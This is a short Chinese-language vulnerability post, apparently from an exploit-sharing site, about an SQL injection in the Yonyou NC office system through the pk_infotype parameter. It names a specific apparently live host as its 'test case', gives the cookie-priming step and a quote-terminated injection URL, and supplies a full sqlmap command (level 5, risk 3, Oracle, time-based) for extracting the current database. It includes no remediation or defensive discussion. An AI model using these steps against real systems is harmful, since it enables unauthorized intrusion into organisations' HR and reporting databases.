用友NC综合办公系统SQL注入漏洞,可同时影响多个办公系统(HR资源管理系统、UFO报表系统等)的数据库
注入链接:/epp/detail/publishinfomore.jsp?pk_infotype=
注入参数:pk_infotype
必须先访问/epp/index.jsp后产生cookie才能进行SQL注入
测试案例:
http://nc.xhlbdc.com

访问首页产生cookie: http://nc.xhlbdc.com/epp/index.jsp

注入链接:http://nc.xhlbdc.com/epp/detail/publishinfomore.jsp?pk_infotype=0001F41000000001ILCW'

【SQLMAP注入】
burpsuite抓包保存为nc.xhlbdc.com.txt文件后,使用SQLMAP注入:
python sqlmap.py -r /c/nc.xhlbdc.com.txt -p pk_infotype --level 5 --risk 3 --dbms oracle --batch --random-agent --technique=T --current-db -v 3

暂无评论